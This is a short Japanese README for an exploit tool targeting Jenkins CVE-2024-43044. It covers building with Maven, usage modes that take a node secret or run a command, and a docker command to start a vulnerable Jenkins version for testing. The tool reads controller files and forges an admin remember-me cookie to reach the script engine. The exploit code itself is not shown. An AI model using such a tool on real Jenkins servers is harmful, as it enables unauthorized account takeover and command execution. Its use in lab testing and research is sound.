
Jenkins における脆弱性 CVE-2024-43044 のエクスプロイト
これはCVE-2024-43044のエクスプロイトです。任意ファイル読み取りの脆弱性で、エージェントがコントローラからファイルを取得できるようになります。
このエクスプロイトは、この脆弱性を利用してファイルを読み取り、管理者アカウントのremember-meクッキーを偽造して、Jenkinsスクリプティングエンジンへのアクセスを取得します。
完全な解説は https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/ をご覧ください。
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
dockerを使用して、脆弱性のあるバージョンでテストできます:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Jenkinsが起動したら、エージェントをセットアップしてください。
コントローラ/エージェント接続は、デフォルト(url、nodename、secretを使用)またはSSH経由のいずれかになります。
.